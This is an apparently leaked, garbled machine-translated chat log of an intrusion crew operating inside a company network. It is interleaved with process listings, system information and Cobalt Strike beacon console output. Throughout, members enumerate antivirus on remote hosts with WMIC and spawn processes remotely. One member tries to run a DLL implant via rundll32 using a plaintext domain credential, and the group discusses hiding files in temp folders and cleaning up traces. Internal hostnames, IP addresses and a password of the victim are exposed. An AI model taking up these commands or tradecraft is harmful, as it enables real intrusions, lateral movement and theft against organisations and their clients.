msdtc.exe 3860 Services 0 7,732 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4344 Services 0 9,276 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4360 Services 0 9,288 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4376 Services 0 9,280 K NT AUTHORITY\NETWORK SERVICE 0:00:00
postgres.exe 4392 Services 0 49,000 K NT AUTHORITY\NETWORK SERVICE 0:00:18
postgres.exe 4408 Services 0 56,348 K NT AUTHORITY\NETWORK SERVICE 0:00:09
RouterNT.exe 4936 Services 0 8,948 K NT AUTHORITY\SYSTEM 0:00:23
GoogleCrashHandler.exe 5096 Services 0 1,284 K NT AUTHORITY\SYSTEM 0:00:05
GoogleCrashHandler64.exe 5116 Services 0 920 K NT AUTHORITY\SYSTEM 0:00:00
WinCollect.exe 3576 Services 0 20,620 K NT AUTHORITY\SYSTEM 28:12:27
conhost.exe 3900 Services 0 3,072 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3764 Services 0 22,964 K NT AUTHORITY\SYSTEM 0:41:26
WmiPrvSE.exe 4700 Services 0 14,984 K NT AUTHORITY\SYSTEM 0:04:57
ManagementAgentNT.exe 1524 Services 0 7,632 K NT AUTHORITY\SYSTEM 0:03:39
swc_service.exe 1056 Services 0 6,776 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 4568 Services 0 382,324 K NT AUTHORITY\LOCAL SERVICE 1:06:09
SAVAdminService.exe 1288 Services 0 3,348 K NT AUTHORITY\SYSTEM 0:00:03
swi_service.exe 2580 Services 0 20,016 K NT AUTHORITY\SYSTEM 0:00:01
swi_filter.exe 1748 Services 0 4,412 K NT AUTHORITY\SYSTEM 0:00:00
swi_fc.exe 976 Services 0 19,672 K NT AUTHORITY\SYSTEM 0:00:05
ALsvc.exe 1808 Services 0 2,440 K NT AUTHORITY\SYSTEM 0:01:01

``Processes from one to the studio tomcatvot these 4 more?
    TLCAutoTF2.loomisco.com
    TLCANALYTICS1.loomisco.com
    TLCAutoTFR.loomisco.com
    TLCSKLM1.loomisco.com
TLCEPICCS01.loomisco.com
```
there's a description of Applied Epic in this group ```
Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace
``````
Network Card(s): 1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled: No
                                 IP address(es).
                                 [01]: 192.168.0.100

``````
Host Name: EPICAPM
OS Name: Microsoft Windows Server 2012 Standard
OS Version: 6.2.9200 N/A Build 9200
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner:
Registered Organization:
Product ID: 00184-20216-77791-AA002
Original Install Date: 12/30/2015, 3:54:54 AM
System Boot Time: 6/13/2020, 6:34:03 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2594 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 8.032 MB
Available Physical Memory: 6.263 MB
Virtual Memory: Max Size: 9.952 MB
Virtual Memory: Available: 8,052 MB
Virtual Memory: In Use: 1,900 MB
Page File Location(s): C:\pagefile.sys
Domain: loomisco.com
Logon Server: N/A
Hotfix(s): 169 Hotfix(s) Installed.

```VMs''.
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 20 K NT AUTHORITY\SYSTEM 10724:49:14
System 4 Services 0 304 K N/A 1:45:28
smss.exe 268 Services 0 1,072 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 356 Services 0 4,744 K NT AUTHORITY\SYSTEM 0:00:16
csrss.exe 420 Console 1 3,628 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 428 Services 0 3,940 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 456 Console 1 5,476 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 520 Services 0 12,584 K NT AUTHORITY\SYSTEM 0:05:33
lsass.exe 528 Services 0 15,956 K NT AUTHORITY\SYSTEM 0:09:39
svchost.exe 640 Services 0 7,644 K NT AUTHORITY\SYSTEM 0:00:15
SEDService.exe 672 Services 0 11,020 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 744 Services 0 7,244 K NT AUTHORITY\NETWORK SERVICE 0:02:27
svchost.exe 796 Services 0 16,680 K NT AUTHORITY\LOCAL SERVICE 1:11:22
LogonUI.exe 832 Console 1 27,584 K NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 840 Console 1 33,316 K Window Manager\DWM-1 0:00:00
svchost.exe 864 Services 0 73,508 K NT AUTHORITY\SYSTEM 2:19:36
svchost.exe 908 Services 0 12,780 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 1152 Services 0 23,248 K NT AUTHORITY/NETWORK SERVICE 0:01:56
svchost.exe 1292 Services 0 11,396 K NT AUTHORITY\LOCAL SERVICE 0:00:00
spoolsv.exe 1464 Services 0 9,336 K NT AUTHORITY\SYSTEM 0:00:00
armsvc.exe 1496 Services 0 4,312 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Client.FileServ 1536 Services 0 17,920 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Client.Listener 1616 Services 0 23,084 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Client.ProxySer 1672 Services 0 14,720 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Deployment.Inst 1724 Services 0 23,856 K NT AUTHORITY\SYSTEM 0:00:00
ASI.SMART.Internals.Share 1820 Services 0 24,416 K NT AUTHORITY\SYSTEM 0:00:00
atashost.exe 1864 Services 0 3,856 K NT AUTHORITY\SYSTEM 0:00:00
cissesrv.exe 1884 Services 0 3,756 K NT AUTHORITY\SYSTEM 0:00:00
HpAmsStor.exe 1908 Services 0 3,600 K NT AUTHORITY\SYSTEM 0:00:00
ProLiantMonitor.exe 1956 Services 0 6,440 K NT AUTHORITY\SYSTEM 0:00:00
SSPService.exe 2124 Services 0 18,096 K NT AUTHORITY\SYSTEM 0:00:01
smhstart.exe 2800 Services 0 7,624 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2848 Services 0 14,980 K NT AUTHORITY\SYSTEM 0:32:12
tvnserver.exe 2880 Services 0 5,172 K NT AUTHORITY\SYSTEM 0:00:01
VGAuthService.exe 2948 Services 0 10,728 K NT AUTHORITY\SYSTEM 0:00:00
cmd.exe 2956 Services 0 1,928 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 2968 Services 0 2,936 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 2980 Services 0 16,832 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 3004 Services 0 88,820 K NT AUTHORITY\SYSTEM 1:30:18
ManagementAgentHost.exe 3028 Services 0 10,108 K NT AUTHORITY\SYSTEM 0:00:01
hpqams.exe 3060 Services 0 17,176 K NT AUTHORITY\SYSTEM 1:08:07
rotatelogs.exe 3216 Services 0 3,420 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3224 Services 0 3,424 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3304 Services 0 25,580 K NT AUTHORITY\SYSTEM 0:01:52
WmiPrvSE.exe 3312 Services 0 44,804 K NT AUTHORITY\NETWORK SERVICE 1:38:54
hpsmhd.exe 3424 Services 0 18,220 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3532 Services 0 3,456 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 3540 Services 0 3,056 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3564 Services 0 3,436 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 3572 Services 0 3,052 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4024 Services 0 8,664 K NT AUTHORITY\NETWORK SERVICE 0:00:01
svchost.exe 4060 Services 0 4,648 K NT AUTHORITY\NETWORK SERVICE 0:00:00
dllhost.exe 296 Services 0 10,888 K NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 4284 Services 0 7,660 K NT AUTHORITY\NETWORK SERVICE 0:00:00
RouterNT.exe 4568 Services 0 8,744 K NT AUTHORITY\SYSTEM 0:00:13
ManagementAgentNT.exe 2996 Services 0 7,360 K NT AUTHORITY\SYSTEM 0:03:38
swc_service.exe 4796 Services 0 6,660 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 4704 Services 0 389,444 K NT AUTHORITY\LOCAL SERVICE 1:16:05
SAVAdminService.exe 1252 Services 0 3,340 K NT AUTHORITY\SYSTEM 0:00:04
swi_service.exe 2104 Services 0 19,752 K NT AUTHORITY\SYSTEM 0:00:01
swi_filter.exe 5112 Services 0 4,400 K NT AUTHORITY\SYSTEM 0:00:00
swi_fc.exe 3056 Services 0 19,596 K NT AUTHORITY\SYSTEM 0:00:01
ALsvc.exe 788 Services 0 2,352 K NT AUTHORITY\SYSTEM
``So what processes are they? >description: EPIC Dashboard Server (PC)
OU=EPIC SERVICE
Dashboard Server:
    EpicAPM.loomisco.com
Central Server:
    TLCEPICCS01.loomisco.com

MoveIt Server:
    TLCAutoTF2.loomisco.com
    TLCANALYTICS1.loomisco.com
    TLCAutoTFR.loomisco.com
    TLCSKLM1.loomisco.com
``write in isis''.
inetinfo.exe" is a component of Microsoft Internet Information Services (IIS), the popular web server package widely deployed on the Internet
``inetinfo.exe
HandleCount Name Priority ProcessId ThreadCount WorkingSetSize

0 System Idle Process 0 0 4 4096

928 System 8 4 119 143360

51 smss.exe 11 332 2 1245184

423 csrss.exe 13 444 12 4632576

114 csrss.exe 13 536 10 4132864

95 wininit.exe 13 560 1 5029888

157 winlogon.exe 13 604 2 8785920

340 services.exe 9 684 4 10944512

1015 lsass.exe 9 708 8 21753856

503 svchost.exe 8 804 13 15306752

555 svchost.exe 8 868 8 9678848

405 LogonUI.exe 13 952 10 47247360

311 dwm.exe 13 960 9 37392384

450 svchost.exe 8 1008 23 12296192

521 svchost.exe 8 380 20 21225472

426 svchost.exe 8 540 13 17879040

543 svchost.exe 8 664 23 19382272

654 svchost.exe 8 912 20 24899584

422 svchost.exe 8 1168 18 17412096

277 SEDService.exe 8 1184 18 17870848

144 svchost.exe 8 1284 4 6750208

1728 svchost.exe 8 1292 37 61165568

289 WUDFHost.exe 8 1380 6 8069120

659 SavService.exe 8 1956 74 287371264

160 svchost.exe 8 2244 6 7168000

424 spoolsv.exe 8 2448 11 16535552

150 MDM.EXE 8 2640 3 8101888

161 inetinfo.exe 8 2648 5 17334272

337 mqsvc.exe 8 2668 31 13676544

205 svchost.exe 8 2692 6 8470528

373 svchost.exe 8 2700 11 22773760

270 SMSvcHost.exe 8 2712 7 22892544

181 SAVAdminService.exe 8 2720 6 4710400

122 svchost.exe 8 2772 2 10158080

177 swc_service.exe 8 2792 6 8200192

352 ManagementAgentNT.exe 8 2804 21 8261632

523 SSPService.exe 8 2868 83 26312704

184 ALsvc.exe 8 2876 8 3194880

185 tvnserver.exe 8 2900 12 7376896

138 swi_filter.exe 8 2920 3 6029312

507 MsMpEng.exe 8 2960 25 179359744

139 svchost.exe 8 3004 8 10702848

218 svchost.exe 8 3012 16 12181504

119 armsvc.exe 8 3040 2 6270976

264 swi_service.exe 8 3048 16 22609920

184 swi_fc.exe 8 3200 6 16805888

202 SMSvcHost.exe 8 3720 5 14598144

194 msdtc.exe 8 4016 9 9834496

347 RouterNT.exe 8 4980 20 8503296

617 SearchIndexer.exe 8 1304 11 16453632

313 WmiPrvSE.exe 8 5016 11 31014912

279 WmiPrvSE.exe 8 4536 11 20398080

180 WmiPrvSE.exe 8 5484 8 10162176

195 WmiPrvSE.exe 8 5764 6 9646080
``will be our local meme)Forgot, now fix itfirst you only need to make a token to run the tripod only remove the hell infopreparation which you did on the serverskai? waiting for the report then and in such cases under the group name in () write a description, what kind of software do group `HCL Sametime` and there this server ``.
HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration
``https://www.processchecker.com/developers_info/25/IBM%20Corpче what's that gadget, can't Google it.
StLaunch.exe 5324 Services 0 4,820 K NT AUTHORITY\SYSTEM 0:00:00
stmsservice.exe 5348 Services 0 18,428 K NT AUTHORITY\SYSTEM 0:00:00
nSTMeetingServer.exe 5376 Services 0 20,548 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 5392 Services 0 3,580 K NT AUTHORITY\SYSTEM 0:00:00
steventserver.exe 5416 Services 0 38,924 K NT AUTHORITY\SYSTEM 0:02:35
stservicemanager.exe 5564 Services 0 33,128 K NT AUTHORITY\SYSTEM 0:01:30
RouterNT.exe 6000 Services 0 8,144 K NT AUTHORITY\SYSTEM 0:00:00
StCommLaunch.exe 3688 Services 0 5,940 K NT AUTHORITY\SYSTEM 0:00:00
STCommunity.exe 6072 Services 0 10,344 K NT AUTHORITY\SYSTEM 0:00:47
STConfigurationApp.exe 524 Services 0 84,984 K NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 5020 Services 0 3,628 K NT AUTHORITY\SYSTEM 0:00:00
StLogger.exe 940 Services 0 220,100 K NT AUTHORITY\SYSTEM 0:00:03
STPlaces.exe 5532 Services 0 7,764 K NT AUTHORITY\SYSTEM 0:00:00
STOnlineDir.exe 5576 Services 0 7,948 K NT AUTHORITY\SYSTEM 0:00:00
stpresencecompatmgr.exe 3356 Services 0 28,844 K NT AUTHORITY\SYSTEM 0:00:02
stpresencemgr.exe 2836 Services 0 35,068 K NT AUTHORITY\SYSTEM 0:01:44
stpresencesubmgr.exe 2272 Services 0 79,188 K NT AUTHORITY\SYSTEM 0:01:33
stuserinfo.exe 3424 Services 0 77,720 K NT AUTHORITY\SYSTEM 0:00:04
STConference.exe 4708 Services 0 7,548 K NT AUTHORITY\SYSTEM 0:00:00
STDirectory.exe 5680 Services 0 50,696 K NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 5996 Services 0 3,620 K NT AUTHORITY\SYSTEM 0:00:00
StChatLogging.exe 5824 Services 0 7,616 K NT AUTHORITY\SYSTEM 0:00:00
StResolve.exe 5728 Services 0 62,780 K NT AUTHORITY\SYSTEM 0:00:15
conhost.exe 5684 Services 0 3,628 K NT AUTHORITY\SYSTEM 0:00:00
StUserStorage.exe 6184 Services 0 471,648 K NT AUTHORITY\SYSTEM 0:00:11
StPrivacy.exe 6248 Services 0 88,028 K NT AUTHORITY\SYSTEM 0:00:00
STMux.exe 6312 Services 0 26,828 K NT AUTHORITY\SYSTEM 0:00:59
StAdminSrv.exe 6360 Services 0 7,468 K NT AUTHORITY\SYSTEM 0:00:00
STSecurity.exe 6400 Services 0 7,436 K NT AUTHORITY\SYSTEM 0:00:00
stpolicy.exe 6440 Services 0 45,056 K NT AUTHORITY\SYSTEM 0:00:04
STFileTransfer.exe 6532 Services 0 7,604 K NT AUTHORITY\SYSTEM 0:00:02
STPolling.exe 6584 Services 0 7,392 K NT AUTHORITY\SYSTEM 0:00:00
StUsers.exe 6660 Services 0 57,984 K
khm khm (@user9) I thought someone was going to say take the hell off of the system, I'm just kidding, is everybody that incomprehensible? then why do we all go home if there is no clues, just make a VMs group
System Manufacturer: VMware, Inc.
System Model: VMware7,1
``and take off sisteminfo``.
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 24 K NT AUTHORITY\SYSTEM 109:24:47
System 4 Services 0 304 K N/A 0:02:32
smss.exe 332 Services 0 1,284 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 420 Services 0 4,996 K NT AUTHORITY\SYSTEM 0:00:55
wininit.exe 472 Services 0 5,268 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 480 Console 1 10,532 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 516 Console 1 4,864 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 572 Services 0 13,168 K NT AUTHORITY\SYSTEM 0:00:10
lsass.exe 588 Services 0 17,344 K NT AUTHORITY\SYSTEM 0:02:05
lsm.exe 596 Services 0 7,252 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 696 Services 0 11,408 K NT AUTHORITY\SYSTEM 0:00:11
SEDService.exe 752 Services 0 13,820 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 844 Services 0 10,016 K NT AUTHORITY\NETWORK SERVICE 0:00:05
LogonUI.exe 916 Console 1 19,572 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 932 Services 0 16,168 K NT AUTHORITY\LOCAL SERVICE 0:00:15
svchost.exe 1016 Services 0 45,260 K NT AUTHORITY\SYSTEM 0:02:12
svchost.exe 428 Services 0 13,484 K NT AUTHORITY\LOCAL SERVICE 0:00:02
svchost.exe 468 Services 0 16,956 K NT AUTHORITY\SYSTEM 0:00:16
SavService.exe 688 Services 0 292,136 K NT AUTHORITY\LOCAL SERVICE 0:13:21
svchost.exe 1304 Services 0 19,736 K NT AUTHORITY\NETWORK SERVICE 0:00:08
svchost.exe 1416 Services 0 11,980 K NT AUTHORITY\LOCAL SERVICE 0:00:00
spoolsv.exe 1560 Services 0 16,348 K NT AUTHORITY\SYSTEM 0:00:03
svchost.exe 1632 Services 0 11,624 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1808 Services 0 2,996 K NT AUTHORITY\LOCAL SERVICE 0:00:00
SAVAdminService.exe 1848 Services 0 3,084 K NT AUTHORITY\SYSTEM 0:00:00
nra.exe 1908 Services 0 12,480 K NT AUTHORITY\SYSTEM 0:00:00
nrcuser.exe 1328 Services 0 114,912 K NT AUTHORITY\SYSTEM 0:00:00
ManagementAgentNT.exe 1504 Services 0 6,924 K NT AUTHORITY\SYSTEM 0:00:39
ALsvc.exe 2228 Services 0 2,168 K NT AUTHORITY\SYSTEM 0:00:08
SSPService.exe 2364 Services 0 21,696 K NT AUTHORITY\SYSTEM 0:00:01
swc_service.exe 2420 Services 0 6,280 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 2536 Services 0 24,112 K NT AUTHORITY\SYSTEM 0:00:00
tvnserver.exe 2596 Services 0 7,004 K NT AUTHORITY\SYSTEM 0:00:00
VGAuthService.exe 2692 Services 0 11,156 K NT AUTHORITY\SYSTEM 0:00:00
vmtoolsd.exe 2760 Services 0 22,260 K NT AUTHORITY\SYSTEM 0:02:31
ManagementAgentHost.exe 2812 Services 0 10,320 K NT AUTHORITY\SYSTEM 0:00:00
WinCollectSvc.exe 2176 Services 0 11,540 K NT AUTHORITY\SYSTEM 0:01:49
WinCollect.exe 3096 Services 0 20,928 K NT AUTHORITY\SYSTEM 0:44:21
conhost.exe 3108 Services 0 3,524 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 3212 Services 0 20,300 K NT AUTHORITY\NETWORK SERVICE 0:01:49
svchost.exe 3696 Services 0 10,296 K NT AUTHORITY\NETWORK SERVICE 0:00:01
svchost.exe 3756 Services 0 6,744 K NT AUTHORITY\NETWORK SERVICE 0:00:00
dllhost.exe 3892 Services 0 12,556 K NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 4044 Services 0 8,564 K NT AUTHORITY\NETWORK SERVICE 0:00:00
RouterNT.exe 5040 Services 0 8,072 K NT AUTHORITY\SYSTEM 0:00:00
ANServer.exe 2188 Services 0 13,412 K LOOMIS\gentranadm 0:00:20
Mercury.exe 1320 Services 0 11,960 K LOOMIS\gentranadm 0:00:01
WmiPrvSE.exe 2260 Services 0 21,468 K NT AUTHORITY\SYSTEM 0:00:03
RpcSrv.exe 4868 Services 0 12,004 K LOOMIS\gentranadm 0:00:03
TrustedInstaller.exe 4840 Services 0 737,992 K NT AUTHORITY\SYSTEM 0:01:57

``a list of processes in the studiovirtualka what else? if TightVNC process hangs in the RDS can you throw the server? I would generally recommend that you start learning ps or batsyrazvedeniya with batnik, stupid in syntax) still useful this script of course ping that did not have to then end of the day did all wellmodtsida no I thought that you did supernatural)aaa[ ](https://mediaeveryonecom/group/archive-loomisco-com?msg=FmF4byGeqBMLNNFaB) so I just got into the process))) aah, that's not it.@user9 throw pliz example commands, write yourself in the notes on spawning sessions from another context through jump with crudes yeah?
 beacon from Shutdown@192.168.0.249 (SCANSTORAGE)
``Then clean up, delete files, tsk, processes and in slipda and that's it for today the list of servers to finish everything, great after all docudocumentation please share with colleagues and add if something is missing who documented the current information for today?
    IMAGING2-NEW.loomisco.com
Block GPO:
    Metafile-vm1.loomisco.com

these? + a fully sorted list of servers and the result is shuffleable I think you understand that the frontend is just the interface for interoperability
Sophos.FrontEnd.Service.e 4816 Services 0 99,720 K LOOMIS\lynx 0:00:06
``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=CrSPtfnFspCxPtC6v) list[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jHTWaeKQKgJGK7qHM) 1
 [ManagementAgentNT.exe]
  TCP 10.10.10.56:54963 192.168.0.109:8194
``As you understood, remove the netstat and see where it sends the data``.
ManagementAgentNT.exe file information

The process known as Sophos Agent belongs to Sophos Messaging System or Sophos Remote Management System software
``To remove doubts on a bare-metal server, non-standard processes will be ABs``.
ManagementAgentNT.exe 1992 Services 0 6,616 K NT AUTHORITY\SYSTEM 0:02:41
swc_service.exe 1340 Services 0 5,212 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 9812 Services 0 360,792 K NT AUTHORITY\LOCAL SERVICE 1:03:33
SAVAdminService.exe 7228 Services 0 5,704 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 4432 Services 0 23,152 K NT AUTHORITY\SYSTEM 0:00:01
``So it's simple - we saw in the processes AB (sofos) in networks it is centralized in its adminstrate search AB in the network)`` While the scan goes160 of 543 works shufflefinder, enough sofos everywherepft,fkcz ping them there live 1/10``
beacon> shell WMIC /Node:192.168.4.28 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.4.28 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 139 bytes
[+] received output:




displayName=Sophos Anti-Virus


``Chrome is open under Give a list of processes from here: `192.168.0.109` what exactly?
beacon> shell WMIC /Node:192.168.1.235 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.1.235 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 140 bytes
[+] received output:




displayName=Sophos Anti-Virus





``@user8 do not delete files means?
The taskeng.exe process is part of the Task Scheduler Engine of Microsoft
Isn't the box that pops up at startup of the Delloks called taskeng.exe? )))) great, make a shuffinder and the process from YES[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pMwiwkBPrSzjwLxZ7) will hang there) then the following method: make a batch with timeout 9999999 and run us stasx apparently when you run it, dlk is not working and cmd is running under YES[ ](https://mediaeveryonecom/group/archive-loomisco-com?msg=T8ffZsEkytLgk4NjD) by inertia did the process hang[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=dzCgGB82tkcZDXArb) why is it here? PS look sheet[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=izJa5MLu3dXbY2Sjd) ``
shell wmic /node:10.10.10.56 process call create "cmd /c netstat.exe -abno > C:\Windows\Temp\output.txt"

```
Take ```.
beacon> runas /user:loomisco.com\Shutdown p3bk@c1 "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint"
[*] Tasked beacon to execute: "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown
[+] host called home, sent: 125 bytes
[-] could not run "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown: 5
```
what did i do wrong ?
beacon> shell WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 139 bytes
[+] received output:
ERROR:

Description = The RPC server is unavailable.


``and all then@user8 in notes syntax[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=yYkABwJhkA8ELWjGJ) second[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=FX8LTXvLS4Yv2jQf7) which bicon[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=pkcJTCAtBsPiBCb5P) there may be another AB on top)yes it worked out and file not giveghere netstat more?[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=MKeNbEDTM3fFiTCMF) which is obvious and 2 more pk for accuracy ``
beacon> shell WMIC /Node:192.168.0.107 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.0.107 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 140 bytes
[+] received output:




displayName=Sophos Anti-Virus


Waiting)) everything will be here [ ] (https://mediaeveryone.com/group/archive-loomisco-com?msg=4yRLZ27gz2fcHZEjG) 1Da sure I asked for user PCs for a reason [ ] (https://mediaeveryone.com/group/archive-loomisco-com?msg=DXTtNivyhKiYG3R2G) The above link does not work on server OSes, because such namespace does not exist as such `C:\Windows\temp\vmware-temp\AgentNT.dll` - again, did not pay attention, that's the same metafile` `` I am confused.
Node:10.10.10.56
```
what os? now i will try by the way ranas did not work? with the creed can try through vmik if you just start the dll then the session appears and without stask? as i have not tried, through the stask can not start the dll ``
beacon> shell WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 138 bytes
[+] received output:
ERROR:

Description = Invalid namespace


``[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=s2h9mkJEncYNNDKjM) just change the node[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=Td6keCTc5tChNk3tn) and in which beacon? Yes, some ancient manuscript ``WMIC /Node:localhost /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List `` I think something in Latin[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=ReWK9JmyeG4GA7KZL) give you a nickname if you understand it here take another list of AVs on user PCs, 2-3 pcs, kznm ``
beacon> shell wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[+] host called home, sent: 136 bytes
[+] received output:
Invalid Global Switch.


beacon> shell wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 8144;
	ReturnValue = 0;
};

``and C:\windows\temp alwaysC:\temp is not alwaysC:\tempC:\, C:\users are quite visible places it is clear, I for example do not recommend to put files in such places, since the systems rights anyway - C:\windows\tempwmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\output.txt"@user8 then let's see the list of installed software
Metafile-vm1.loomisco.com
``Maybe it's this @user7 add /RP just in case /RP is not a filewasher at all```
beacon> shell rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint
[*] Tasked beacon to run: rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint
```
Does it work that way?
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 24 K NT AUTHORITY\SYSTEM 1767:21:11
System 4 Services 0 6,104 K N/A 0:02:10
smss.exe 424 Services 0 740 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 492 Services 0 5,728 K NT AUTHORITY\SYSTEM 0:00:21
csrss.exe 536 Console 1 10,136 K NT AUTHORITY\SYSTEM 0:00:00
wininit.exe 544 Services 0 4,264 K NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 592 Console 1 5,228 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 624 Services 0 8,488 K NT AUTHORITY\SYSTEM 0:00:09
lsass.exe 636 Services 0 17,392 K NT AUTHORITY\SYSTEM 0:06:14
lsm.exe 644 Services 0 5,700 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 804 Services 0 7,880 K NT AUTHORITY\SYSTEM 0:02:06
svchost.exe 864 Services 0 7,976 K NT AUTHORITY\NETWORK SERVICE 0:00:59
svchost.exe 960 Services 0 12,636 K NT AUTHORITY\LOCAL SERVICE 0:02:09
svchost.exe 1032 Services 0 9,528 K NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 1044 Services 0 60,424 K NT AUTHORITY\SYSTEM 0:27:09
